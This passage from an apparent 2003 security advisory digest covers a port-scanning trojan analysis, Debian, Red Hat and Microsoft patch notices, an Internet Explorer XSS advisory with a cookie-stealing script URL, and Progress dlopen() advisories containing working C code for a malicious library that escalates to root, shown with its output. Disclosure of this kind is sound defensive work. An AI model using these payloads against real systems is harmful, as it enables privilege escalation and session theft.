trojan may not be far more malicious in nature and contain worm or
backdoor functionality. We are referring to the trojan we have captured,
and the presumed other existing trojans generating similar traffic as
"55808 Trojans," and the specific binary we have analyzed as "55808
Trojan - Variant A." All discussion in our analysis section refers
specifically to the 'A' variant we have captured.  Internet Security
Systems subsequent to the release of this alert dubbed this "Stumbler",
and refers to this same trojan by that name.


Analysis:

This trojan aims to be a distributed port scanner whose presence is very
difficult to detect. It port scans random addresses across the IP
address space, with a random source address also spoofed. By spoofing
the source address, the trojan is able to avoid easy detection, but it
also means it can not receive the results of the TCP SYN that is sent.
However, since the trojan also sniffs the network it is on in
promiscuous mode, it is likely, over time, to pick up scans from other
installations of trojans that randomly selected a source address that
happened to be on its subnet. As the number of trojans installed across
the Internet grows, more spoofed packets will be sent out by each
trojan, and more of the spoofed source addresses will be captured by
other trojans. 

Each time a reply to a trojan is seen, indicating an open port has been
found, it is written to a file and saved. Daily, the trojan will then
deliver the list of open ports it recorded while sniffing to a file and
deliver that file to a predefined IP address.

In addition, a specially crafted packet can be sent to the subnet the
trojan is listening on which contains in its sequence number the IP
address the trojan should deliver the open port list to daily.  However,
in the current incarnations of this trojan this functionality appears to
be disabled.

Finally, the trojan contains a feature whereby if it fails to connect to
the IP address it is supposed to deliver its open ports list to, it will
automatically attempt to remove itself from the system.

The trojan we have identified has been a file named 'a' that resides in
/tmp/.../a on the filesystem. Its packet collection activity monitors
for any packet with a window size of 55808 and records all packets
matching that window size. The packet capture is written to its current
directory (/tmp/.../ typically) in a file named 'r'. 

There is a default IP address of 12.108.65.76 that the trojan attempts
to make a standard connection (not spoofed) to on TCP port 22 and
deliver the packet capture after it has been running for 24 hours,
however this appears to have been randomly selected as it is not an
active system on the Internet, and it is potentially dynamically
modifiable by a packet that can be sent to the trojan.

The trojan appears to contain some functionality to change the IP
address it delivers its packet captures to, but this functionality is
not operational in the trojan we have obtained.  It appears the stubbed
out code, if activated, would function as follows:  If a packet is
captured that contains a window size of 55808 and a TCP option window
scale of 2, the trojan modifies the IP address packet captures are
delivered to based on the sequence number of that packet.

While a novel concept, this trojan seems largely to have been written as
a proof of concept relative to the ideas Lancope described as a '3rd
generation trojan.' Other than generating large amounts of network
traffic, it contains no self-replicating or malicious behavior, and a
few high-speed port scans from compromised host would be a far more
effective and efficient means to map open ports on the Internet than
this type of trojan.

We have only observed the trojan on Linux systems to date. However, the
program itself is quite portable to other unix variants, so it is
possible if not likely 
that it may also exist on other unix distributions. It is also possible
that the 'original' trojan is Windows-based.

The trojan appears to be installed on a system either manually, or
through an external exploit that is unrelated to the trojan itself.
There is no exploit code or means to install itself on a host built-in
to the trojan itself.  It is easy to identify that a system on your
network has been infected with this or a related trojan due to its
extremely noisy network activity it generates with TCP packets with a
window size of 55808.

There is apt to
be a great deal of discussion in the general techniques that can be used
to locate it, a good starting resource for this is "Tracking Down the
Phantom Host" by John Payton available at
http://www.securityfocus.com/infocus/1705. 

New eldav packages (for Debian) fix insecure temporary file creation

2003-06-19

Risk level: high

Type: insecure temporary file

Source of info: Debian Security Team

Impact

eldav, a WebDAV client for Emacs, creates temporary files without
taking appropriate security precautions.  This vulnerability could be
exploited by a local user to create or overwrite files with the
privileges of the user running emacs and eldav.

Overview

CVE Ids        : CAN-2003-0438

eldav, a WebDAV client for Emacs, creates temporary files without
taking appropriate security precautions.  This vulnerability could be
exploited by a local user to create or overwrite files with the
privileges of the user running emacs and eldav.

For the stable distribution (woody) this problem has been fixed in
version 0.0.20020411-1woody1.

The old stable distribution (potato) does not contain an eldav
package.

For the unstable distribution (sid) this problem has been fixed in
version 0.7.2-1.

We recommend that you update your eldav package.

Patches

Source archives:

    http://security.debian.org/pool/updates/main/e/eldav/eldav_0.0.20020411-1woody1.dsc
      Size/MD5 checksum:      592 9dd06517b53570a595d5c368924ceda1
    http://security.debian.org/pool/updates/main/e/eldav/eldav_0.0.20020411-1woody1.diff.gz
      Size/MD5 checksum:     3814 c4400b418452e1aea9a115a2af82e1aa
    http://security.debian.org/pool/updates/main/e/eldav/eldav_0.0.20020411.orig.tar.gz
      Size/MD5 checksum:    12319 3b62e4b9b05eb1c8ef27e9f5d3b98db2

  Architecture independent components:

    http://security.debian.org/pool/updates/main/e/eldav/eldav_0.0.20020411-1woody1_all.deb
      Size/MD5 checksum:    15546 5dc5beca6a1c57b5a4b32968ebc07da4

Updated Xpdf packages (for Red Hat) fix security vulnerability

2003-06-18

Risk level: high

Type: flaw

Source of info: Red Hat Security Team

Impact

Updated Xpdf packages are available that fix a vulnerability where a
malicious PDF document could run arbitrary code.

Overview

Xpdf is an X Window System based viewer for Portable Document Format
(PDF) files.

Martyn Gilmore discovered a flaw in various PDF viewers and readers.  An
attacker can embed malicious external-type hyperlinks that if activated or
followed by a victim can execute arbitrary shell commands.   The Common
Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CAN-2003-0434 to this issue.

All users of Xpdf are advised to upgrade to these errata packages, which
contain a patch to correct this issue.

Patches

Red Hat Linux 7.1:
SRPMS:
ftp://updates.redhat.com/7.1/en/os/SRPMS/xpdf-0.92-4.71.1.src.rpm

i386:
ftp://updates.redhat.com/7.1/en/os/i386/xpdf-0.92-4.71.1.i386.rpm

Red Hat Linux 7.2:
SRPMS:
ftp://updates.redhat.com/7.2/en/os/SRPMS/xpdf-0.92-9.src.rpm

i386:
ftp://updates.redhat.com/7.2/en/os/i386/xpdf-0.92-9.i386.rpm

ia64:
ftp://updates.redhat.com/7.2/en/os/ia64/xpdf-0.92-9.ia64.rpm

Red Hat Linux 7.3:

SRPMS:
ftp://updates.redhat.com/7.3/en/os/SRPMS/xpdf-1.00-6.src.rpm

i386:
ftp://updates.redhat.com/7.3/en/os/i386/xpdf-1.00-6.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/xpdf-chinese-simplified-1.00-6.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/xpdf-chinese-traditional-1.00-6.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/xpdf-japanese-1.00-6.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/xpdf-korean-1.00-6.i386.rpm

Red Hat Linux 8.0:

SRPMS:
ftp://updates.redhat.com/8.0/en/os/SRPMS/xpdf-1.01-11.src.rpm

i386:
ftp://updates.redhat.com/8.0/en/os/i386/xpdf-1.01-11.i386.rpm
ftp://updates.redhat.com/8.0/en/os/i386/xpdf-chinese-simplified-1.01-11.i386.rpm
ftp://updates.redhat.com/8.0/en/os/i386/xpdf-chinese-traditional-1.01-11.i386.rpm
ftp://updates.redhat.com/8.0/en/os/i386/xpdf-japanese-1.01-11.i386.rpm
ftp://updates.redhat.com/8.0/en/os/i386/xpdf-korean-1.01-11.i386.rpm

Red Hat Linux 9:

SRPMS:
ftp://updates.redhat.com/9/en/os/SRPMS/xpdf-2.01-9.src.rpm

i386:
ftp://updates.redhat.com/9/en/os/i386/xpdf-2.01-9.i386.rpm
ftp://updates.redhat.com/9/en/os/i386/xpdf-chinese-simplified-2.01-9.i386.rpm
ftp://updates.redhat.com/9/en/os/i386/xpdf-chinese-traditional-2.01-9.i386.rpm
ftp://updates.redhat.com/9/en/os/i386/xpdf-japanese-2.01-9.i386.rpm
ftp://updates.redhat.com/9/en/os/i386/xpdf-korean-2.01-9.i386.rpm

MIPSPro Compiler Predictable Temp File vulnerability

2003-06-17

Risk level: medium

Type: Buffer overflow

Source of info: SGI Security Team

Impact

SGI acknowledges the compiler temporary file vulnerability reported by
Crimelabs: http://www.crimelabs.net/docs/irix-compiler-tempfile.txt and
is currently investigating.

This issue was assigned the following CVE:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0578

No further information is available at this time.  As further information
becomes available, additional advisories will be issued

Overview

SGI acknowledges the compiler temporary file vulnerability reported by
Crimelabs: http://www.crimelabs.net/docs/irix-compiler-tempfile.txt and
is currently investigating.

This issue was assigned the following CVE:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0578

No further information is available at this time.  As further information
becomes available, additional advisories will be issued.

For the protection of all our customers, SGI does not disclose, discuss or
confirm vulnerabilities until a full investigation has occurred and any
necessary patch(es) or release streams are available for all vulnerable and
supported Linux and IRIX operating systems.

Until SGI has more definitive information to provide, customers are
encouraged to assume all security vulnerabilities as exploitable and take
appropriate steps according to local site security policies and
requirements.

As further information becomes available, additional advisories will be
issued via the normal SGI security information distribution methods
including the wiretap mailing list.

Cross-Site Scripting in Unparsable XML Files.

2003-06-17

Risk level: medium

Type: cross-site-scripting

Source of info: GreyMagic Software

Impact

Internet Explorer automatically attempts to parse any XML file requested
individually by the browser. When the parsing process is successful, a
dynamic tree of the various XML elements is presented. However, when a
parsing error occurs Internet Explorer displays the parse error along with
the URL of the requested XML file. 

In some cases the displayed URL is not filtered
appropriately, and may cause HTML that was passed in the querystring of the
URL to be rendered by the browser. This creates a classic cross-site
scripting attack in almost any XML file that MSXML fails to read.
Practically, this means that leaving XML files on your server that can't be
parsed correctly by Internet Explorer and MSXML is exposing the site to a
global Cross-Site Scripting attack. 

Overview

Affected applications:
======================

Microsoft Internet Explorer 5.5 and 6.0. 

Note that any other application that uses Internet Explorer's engine
(WebBrowser control) is affected as well (AOL Browser, MSN Explorer, etc.). 


Introduction:
=============

Internet Explorer automatically attempts to parse any XML file requested
individually by the browser. When the parsing process is successful, a
dynamic tree of the various XML elements is presented. However, when a
parsing error occurs Internet Explorer displays the parse error along with
the URL of the requested XML file. 


Discussion: 
===========

We have found that in some cases the displayed URL is not filtered
appropriately, and may cause HTML that was passed in the querystring of the
URL to be rendered by the browser. This creates a classic cross-site
scripting attack in almost any XML file that MSXML fails to read.
Practically, this means that leaving XML files on your server that can't be
parsed correctly by Internet Explorer and MSXML is exposing the site to a
global Cross-Site Scripting attack. 

We have been able to reproduce this problem in various setups, but we
couldn't pinpoint the vulnerable component reliably enough. It is most
likely an MSXML issue, and not a flaw in Internet Explorer itself. 


Exploit: 
========

This sample shows the basic URL for injecting content: 

http://host.with.unparsable.xml.file/flaw.xml?<script>alert(document.cookie)
</script> 


Demonstration:
==============

We put together a simple proof of concept demonstration, which can be found
at http://security.greymagic.com/adv/gm013-ie/.


Solution: 
=========

Microsoft was notified on 20-Feb-2003. They reported that they were able to
reproduce this flaw on IE6 Gold, and no other version. Our research showed
different, yet inconsistent results (see "Tested on" section for details). 


Tested on: 
==========

IE5.5 NT4.
IE6 Win98.
IE6 Win2000.

New radiusd-cistron packages fix buffer overflow (in Debian)

2003-06-14

Risk level: high

Type: Buffer overflow

Source of info: Debian Security Team

Impact

radiusd-cistron contains a bug allowing a buffer overflow when a long
NAS-Port attribute is received.  This could allow a remote attacker to
execute arbitrary code on the with the privileges of the RADIUS daemon (usually root).

Overview

Problem-Type   : remote
Debian-specific: no

radiusd-cistron contains a bug allowing a buffer overflow when a long
NAS-Port attribute is received.  This could allow a remote attacker to
execute arbitrary code on the with the privileges of the RADIUS daemon
(usually root).

For the stable distribution (woody) this problem has been fixed in
version 1.6.6-1woody1.

For the old stable distribution (potato), this problem will be fixed
in a later advisory.

For the unstable distribution (sid) this problem will be fixed soon.

We recommend that you update your radiusd-cistron package.

Patches

Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/r/radiusd-cistron/radiusd-cistron_1.6.6-1woody1.dsc
      Size/MD5 checksum:      611 b6a3c69ca08b1f6984147e64f7ddcaab
    http://security.debian.org/pool/updates/main/r/radiusd-cistron/radiusd-cistron_1.6.6-1woody1.diff.gz
      Size/MD5 checksum:     4221 ad563e14d3f3da713973cd23e97dcef5
    http://security.debian.org/pool/updates/main/r/radiusd-cistron/radiusd-cistron_1.6.6.orig.tar.gz
      Size/MD5 checksum:   194154 16084870890fd2ec577dbe183b51a379

  Alpha architecture:

    http://security.debian.org/pool/updates/main/r/radiusd-cistron/radiusd-cistron_1.6.6-1woody1_alpha.deb
      Size/MD5 checksum:   262652 b541753d08f0d124a9f48133eeac381e

  ARM architecture:

    http://security.debian.org/pool/updates/main/r/radiusd-cistron/radiusd-cistron_1.6.6-1woody1_arm.deb
      Size/MD5 checksum:   235578 6277971c73bf52c22b5623f9131a8d9f

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/r/radiusd-cistron/radiusd-cistron_1.6.6-1woody1_i386.deb
      Size/MD5 checksum:   231960 9ca72ec922c0fd80e22d05a06176b265

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/r/radiusd-cistron/radiusd-cistron_1.6.6-1woody1_ia64.deb
      Size/MD5 checksum:   365566 ea7299686e6629039ecdf81abdebd5ee

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/r/radiusd-cistron/radiusd-cistron_1.6.6-1woody1_hppa.deb
      Size/MD5 checksum:   235502 886c9f6006c80dcf3c4c5305c76411b7

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/r/radiusd-cistron/radiusd-cistron_1.6.6-1woody1_m68k.deb
      Size/MD5 checksum:   225678 39c53545d15bb167550fd462a139fc35

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/r/radiusd-cistron/radiusd-cistron_1.6.6-1woody1_mips.deb
      Size/MD5 checksum:   246130 3d98988fb2128bc26735c1c5b7a41cde

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/r/radiusd-cistron/radiusd-cistron_1.6.6-1woody1_mipsel.deb
      Size/MD5 checksum:   245672 88e63e2d94973aa7e65176b81184ed80

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/r/radiusd-cistron/radiusd-cistron_1.6.6-1woody1_powerpc.deb
      Size/MD5 checksum:   229238 eb1d0a109bb66e3d39c902f561779afc

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/r/radiusd-cistron/radiusd-cistron_1.6.6-1woody1_s390.deb
      Size/MD5 checksum:   238530 396c1a07cc893b3d77a1ecfcbc0ee57a

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/r/radiusd-cistron/radiusd-cistron_1.6.6-1woody1_sparc.deb
      Size/MD5 checksum:   248882 0e39dd1a1310e1afedc4d39e2b8d2794

New mikmod packages fix buffer overflow (in Debian)

2003-06-14

Risk level: medium

Type: Buffer overflow

Source of info: Debian Security Team

Impact

Ingo Saitz discovered a bug in mikmod whereby a long filename inside
an archive file can overflow a buffer when the archive is being read
by mikmod.

Overview

Ingo Saitz discovered a bug in mikmod whereby a long filename inside
an archive file can overflow a buffer when the archive is being read
by mikmod. It is locally exploitable.

For the stable distribution (woody) this problem has been fixed in
version 3.1.6-4woody3.

For old stable distribution (potato) this problem has been fixed in
version 3.1.6-2potato3.

For the unstable distribution (sid) this problem is fixed in version
3.1.6-6.

Patches

Source archives:

http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6-2potato3.dsc
      Size/MD5 checksum:      595 d0a811016b5025b327eea822373f12d5
    http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6-2potato3.diff.gz
      Size/MD5 checksum:     6207 2ce7c29ac4c12632de56a1db093982f7
    http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6.orig.tar.gz
      Size/MD5 checksum:   134827 71d8142ae3ae27034535913e906b1384

  Alpha architecture:

    http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6-2potato3_alpha.deb
      Size/MD5 checksum:    62968 0c0d4ff734a7c02e4d8c862bb3745713

  ARM architecture:

    http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6-2potato3_arm.deb
      Size/MD5 checksum:    52588 7d5da70323e8549fc7cf5528173f3d1d

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6-2potato3_i386.deb
      Size/MD5 checksum:    50666 f00f6100852c6a25be4909e861368877

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6-2potato3_m68k.deb
      Size/MD5 checksum:    48942 390d71cc5d5f98e84e077961740b9608

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6-2potato3_powerpc.deb
      Size/MD5 checksum:    53578 ef6419433633f01244eafeb7b61d0e6c

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6-2potato3_sparc.deb
      Size/MD5 checksum:    54836 ca9367c16507f4ed6d247cc7001d777a

Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6-4woody3.dsc
      Size/MD5 checksum:      608 b52405fb77329efddae915e145a9751d
    http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6-4woody3.diff.gz
      Size/MD5 checksum:     9726 35080e8530e9924be4d86aafbd31b84d
    http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6.orig.tar.gz
      Size/MD5 checksum:   134827 71d8142ae3ae27034535913e906b1384

  Alpha architecture:

    http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6-4woody3_alpha.deb
      Size/MD5 checksum:    62712 fe5456aa0ca7a1819fd1bb87b82bde1a

  ARM architecture:

    http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6-4woody3_arm.deb
      Size/MD5 checksum:    52602 d75974481a2b2e23c47a7f700bf878e5

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6-4woody3_i386.deb
      Size/MD5 checksum:    50578 fde5b864a91bdddf1b07720af26cf5d5

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6-4woody3_ia64.deb
      Size/MD5 checksum:    76108 ad1cbef734d43f5e0fa5bad3c7f1cd72

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6-4woody3_hppa.deb
      Size/MD5 checksum:    58482 9edb50e45214bc0b3225f5070df2b59f

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6-4woody3_m68k.deb
      Size/MD5 checksum:    48554 a52f8913418501bf6a4b103e14636436

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6-4woody3_mips.deb
      Size/MD5 checksum:    57352 4edbef3712ec7220cdbe410c61aa8406

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6-4woody3_mipsel.deb
      Size/MD5 checksum:    57538 f0846374f89bc626f6ed29fd82bbd4af

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6-4woody3_powerpc.deb
      Size/MD5 checksum:    53758 9a8e2a41cf260e5eecfd0472f2f574e6

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6-4woody3_s390.deb
      Size/MD5 checksum:    53038 bddc8a9dcdea2b4386b5d5a4b3d281e1

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6-4woody3_sparc.deb
      Size/MD5 checksum:    52786 9da2c9dc87e8c9d742483e5929c2e90f

Progress _dbagent -installdir dlopen() issue

2003-06-14

Risk level: high

Type: Buffer overflow

Source of info: Secure Network Operations, Inc.

Impact

Poor usage of dlopen() causes local root
compromise

Overview

Progress applications make the use of several helper .dll and .so binaries. 
When looking for shared object files _dbagent looks at the argument passed
to the command line option "-installdir". No verification is performed 
upon the object that is located thus local non super users can make 
themselves root. 

This vulnerability is a rehash of SRT2003-06-13-0945.txt with the 
difference being the method by which the application determines where the
dlopen() should search. 

elguapo@rh8 9.1C]$ cat /usr/dlc/version
echo PROGRESS Version 9.1C as of Thu Jun  7 10:03:59 EDT 2001

here we are using "-installdir /tmp" as the options to _dbagent

snprintf("/tmp/lib/librocket_r.so",303,"%s/lib/%s","/tmp","librocket_r.so") 
memset(0xbfffece0, '\000', 303)                   = 0xbfffece0
strncpy(0xbfffece0, "/tmp/lib/librocket_r.so", 303) = 0xbfffece0
dlopen("/tmp/lib/librocket_r.so", 257
This is a fake _init in the fake libjutil.so
uid=0(root) gid=500(elguapo) groups=500(elguapo)


a valid work around to nearly any Progress security hole is to remove the 
suid bit from all binaries

Progress PATH based dlopen() issue

2003-06-14

Risk level: high

Type: local root compromise

Source of info: Secure Network Operations, Inc.

Impact

Poor usage of dlopen() causes local root
compromise

Overview

Progress applications make the use of several helper .dll and .so binaries. 
When looking for shared object files for use in a dlopen statement Progress
choose to look in the users PATH. No verification is performed upon the 
object that is located thus local non super users can make themselves root. 
*Most* binaries in /usr/dlc/bin can be exploited via this method. 

[elguapo@rh8 elguapo]$ ls -al /usr/dlc/bin/_proapsv
-rwsr-xr-x    1 root   root    5258733 Nov 23 02:01 /usr/dlc/bin/_proapsv

getenv("DLC")                                     = NULL
strcpy(0xbffff350, "libjutil.so")                 = 0xbffff350
memmove(0xbfffefc8, 0xbffff350, 12, 0x084a2a50, 0x084e1310) = 0xbfffefc8
access("libjutil.so", 4)                          = -1
__errno_location()                                = 0x4212a620
getenv("PATH")                                    = "/usr/local/bin:/bin...
strcat("/usr/local/bin", "/")                     = "/usr/local/bin/"
strcat("/usr/local/bin/", "libjutil.so")     = "/usr/local/bin/libjutil.so"
access("/usr/local/bin/libjutil.so", 4)           = -1
...
strcat("/home/elguapo/bin/", "libjutil.so") "/home/elguapo/bin/libjutil.so"
access("/home/elguapo/bin/libjutil.so", 4)        = 0

As you can see the library libjutil.so is searched for in the users PATH. 

Thanks to core@bokeoa.com for giving me an example shared library example 
... it made exploiting this problem quite simple. 

#include <stdio.h>
#include <string.h>

// If you wanted to get creative you can hack out some fake functions for 
// use later ... but theres no need... just use _init

int ehnLogOpen(int argc, char * const argv[], const char *optstring) {
	printf("This is a fake ehnLogOpen \n");
}
int ehnLogClose(int argc, char * const argv[], const char *optstring) {
	printf("This is a fake ehnLogClose\n");
}

_init() {
   setuid(0);
   setgid(0);
   printf("bullshit library loaded\n");
   system("/usr/bin/id > /tmp/p00p");
   system("cat /tmp/p00p");
}

[elguapo@rh8 elguapo]$ /usr/dlc/bin/_proapsv
This is a fake ehnLogOpen
uid=0(root) gid=500(elguapo) groups=500(elguapo)
+0001%ReadUBproperties failed: WebSpeed error 10007, System error 0,
ServiceName cannot be NULL or blank (6275)#00This is a fake ehnLogClose
uid=0(root) gid=500(elguapo) groups=500(elguapo)

[elguapo@rh8 elguapo]$ /usr/bin/ltrace /usr/dlc/bin/_proapsv

we can see it searches path and finds nothing ... 

getenv("PATH")                                    = NULL
dlopen("libjutil.so", 258)                        = NULL
...
read(3, "Could not open Dynamic Library: "..., 81) = 81
malloc(51)                                        = 0x084df718
dlerror()                                         = "libjutil.so: cannot
open shared "...
lseek(3, 649134, 0)                               = 649134
read(3, "DLL Error : %s (8014)", 81)              = 81

In the above example we just gave it a little help finding the .so 
The dlsym command will help you determine which fake functions you need
to make the exploit work. 

getenv("PATH")                                    = "/tmp"
strcat("/tmp", "/")                               = "/tmp/"
strcat("/tmp/", "libjutil.so")                    = "/tmp/libjutil.so"
access("/tmp/libjutil.so", 4)                     = 0
dlopen("/tmp/libjutil.so", 258)                   = 0x084e1840
dlsym(0x084e1840, "ehnLogOpen")                   = 0x40013414
dlsym(0x084e1840, "ehnLogClose")                  = 0x4001345e
dlsym(0x084e1840, "ehnLogWrite")                  = 0x400134a8
dlsym(0x084e1840, "ehnLogDump")                   = 0x400134f2
dlsym(0x084e1840, "ehnLogGetProperties")          = 0x4001353c
dlsym(0x084e1840, "ehnLogSetProperties")          = 0x40013586
This is a fake ehnLogOpen
uid=0(root) gid=500(elguapo) groups=500(elguapo)


a valid work around to nearly any Progress security hole is to remove the 
suid bit from all binaries

Cumulative Patch for Internet Explorer (818529)

2003-06-04

Risk level: Critical

Type: Buffer overflow

Source of info: CERT

Impact

Allow an attacker to execute code of their choice.

Overview

This is a cumulative patch that includes the functionality of all 
previously released patches for Internet Explorer 5.01, 5.5 and 6.0. 
In addition, it eliminates two newly discovered vulnerabilities: 


 - A buffer overrun vulnerability that occurs because Internet 
Explorer does not properly determine an object type returned from a 
web server. It could be possible for an attacker who exploited this 
vulnerability to run arbitrary code on a user's system. If a user 
visited an attacker's website, it would be possible for the attacker 
to exploit this vulnerability without any other user action. An 
attacker could also craft an HTML email that attempted to exploit 
this vulnerability. 

 - A flaw that results because Internet Explorer does not implement 
an appropriate block on a file download dialog box. It could be 
possible for an attacker to exploit this vulnerability to run 
arbitrary code on a user's system. If a user simply visited an 
attacker's website, it would be possible for the attacker to exploit 
this vulnerability without any other user action. An attacker could 
also craft an HTML email that attempted to exploit this 
vulnerability. 

In order to exploit these flaws, the attacker would have to create a 
specially formed HTML email and send it to the user. Alternatively 
an attacker would have to host a malicious web site that contained a 
web page designed to exploit these vulnerabilities. The attacker 
would then have to persuade a user to visit that site. 

As with the previous Internet Explorer cumulative patches released 
with bulletins MS03-004 and MS03-015, this cumulative patch will 
cause window.showHelp( ) to cease to function if you have not 
applied the HTML Help update. If you have installed the updated HTML 
Help control from Knowledge Base article 811630, you will still be 
able to use HTML Help functionality after applying this patch.

Mitigating factors: 
====================
The following mitigating factors apply to both vulnerabilities 
discussed in this bulletin:


 - By default, Internet Explorer on Windows Server 2003 runs in 
Enhanced Security Configuration. This default configuration of 
Internet Explorer blocks these attacks. If Internet Explorer 
Enhanced Security Configuration has been disabled, the protections 
put in place that prevent these vulnerabilities from being exploited 
would be removed. 
 - In the Web based attack scenario, the attacker would have to host 
a web site that contained a web page used to exploit these 
vulnerabilities. An attacker would have no way to force users to 
visit a malicious web site outside of the HTML email vector. 
Instead, the attacker would need to lure them there, typically by 
getting them to click on a link that would take them to the 
attacker's site. 
 - Code that executed on the system would only run under the 
privileges of the logged in user.  

Patches

http://www.microsoft.com/technet/security/bulletin/ms03-020.asp
http://www.microsoft.com/security/security_bulletins/ms03-020.asp

Cumulative Patch for Internet Information Service (811114)

2003-05-28

Risk level: Important

Type: Buffer overflow

Source of info: Microsoft Security Team

Impact

 Allow an attacker to execute code of their choice

Overview

This patch is a cumulative patch that includes the functionality of 
all security patches released for IIS 4.0 since Windows NT 4.0 
Service Pack 6a, and all security patches released to date for IIS 
5.0 since Windows 2000 Service Pack 2 and IIS 5.1. A complete 
listing of the patches superseded by this patch is provided below, 
in the section titled "Additional information about this patch". 
In addition to all previously released security patches, this patch 
also includes fixes for the following newly discovered security 
vulnerabilities affecting IIS 4.0, 5.0 and 5.1: 
 
- - - A Cross-Site Scripting (CSS) vulnerability affecting IIS 4.0, 
5.0 and 5.1 involving the error message that's returned to advise 
that a requested URL has been redirected. An attacker who was able 
to lure a user into clicking a link on his or her web site could 
relay a request containing script to a third-party web site running 
IIS, thereby causing the third-party site's response (still 
including the script) to be sent to the user. The script would then 
render using the security settings of the third-party site rather 
than the attacker's. 

 - A buffer overrun that results because IIS 5.0 does not correctly 
validate requests for certain types of web pages known as server 
side includes. An attacker would need the ability to upload a 
Server-side include page to a vulnerable IIS server. If the 
attacker then requested this page, a buffer overrun could result, 
which would allow the attacker to execute code of their choice on 
the server with user-level permissions. 

 - A denial of service vulnerability that results because of a flaw 
in the way IIS 4.0 and 5.0 allocate memory requests when 
constructing headers to be returned to a web client. An attacker 
would need the ability to upload an ASP page to a vulnerable IIS 
server. This ASP page, when called by the attacker, would attempt 
to return an extremely large header to the calling web client. 
Because IIS does not limit the amount of memory that can be used in 
this case, this could case IIS to fail as a result of running out 
of local memory. 
 
- - - A denial of service vulnerability that results because IIS 5.0 
and 5.1 do not correctly handle an error condition when an overly 
long WebDAV request is passed to them. As a result an attacker 
could cause IIS to fail - however both IIS 5.0 and 5.1 will by 
default restart immediately after this failure. 
There is a dependency associated with this patch - it requires the 
patch from Microsoft Security Bulletin MS02-050 to be installed. If 
this patch is installed and MS02-050 is not present, client side 
certificates will be rejected. This functionality can be restored 
by installing the MS02-050 patch.

Mitigating Factors:
====================
Redirection Cross Site Scripting: 
 - IIS 6.0 is not affected. 
 - The vulnerability could only be exploited if the attacker could 
   entice another user into visiting a web page and clicking a link
   on it, or opening an HTML mail. 
 - The target page must be an ASP page, which uses 
   Response.Redirect to redirect the client, to a new URL that is 
   based on the incoming URL of current request. 

Server Side Include Web Pages Buffer Overrun 
 - IIS 4.0, IIS 5.1 and IIS 6.0 are not affected. 
 - The IIS Lockdown tool by default disables the ssinc.dll mapping, 
   which will block this attack. 
 - By default IIS 5.0 runs under a user account and not the system 
   account. Therefore an attacker who successfully exploited the 
   vulnerability would only gain user level permissions rather than 
   administrative level permissions. 
 - An attacker must have the ability to upload files to the IIS 
   Server. 

ASP Headers Denial of Service 
 - An attacker must have the ability to upload files to the IIS 
   server. 
 - IIS 5.0 will automatically restart after failing. 
 - IIS 5.1 and IIS 6.0 are not affected. 

WebDAV Denial of Service 
 - IIS 6.0 is not affected. 
 - IIS 5.0 and 5.1 will restart automatically after this failure. 
 - The IIS Lockdown tool disables WebDAV by default, which will 
   block this attack.

Patches

A patch is available to fix this vulnerability. Please read the 
   Security Bulletins at
http://www.microsoft.com/technet/security/bulletin/ms03-018.asp
http://www.microsoft.com/security/security_bulletins/ms03-018.asp
   for information on obtaining this patch.

Cumulative Patch for Internet Explorer

2003-03-10

Risk level: critical

Type: Buffer overflow

Source of info: Microsoft Security Team

Impact

This is a cumulative patch that includes the functionality of all 
previously released patches for Internet Explorer 5.01, 5.5 and 6.0. 
In addition, it eliminates newly discovered 
vulnerabilities

Overview

A vulnerability that occurs because Internet Explorer does not 
properly determine an object type returned from a Web server in a 
popup window. It could be possible for an attacker who exploited this
vulnerability to run arbitrary code on a user's system. If a user 
visited an attacker's Web site, it would be possible for the attacker
to exploit this vulnerability without any other user action. An 
attacker could also craft an HTML-based e-mail that would attempt to 
exploit this vulnerability.

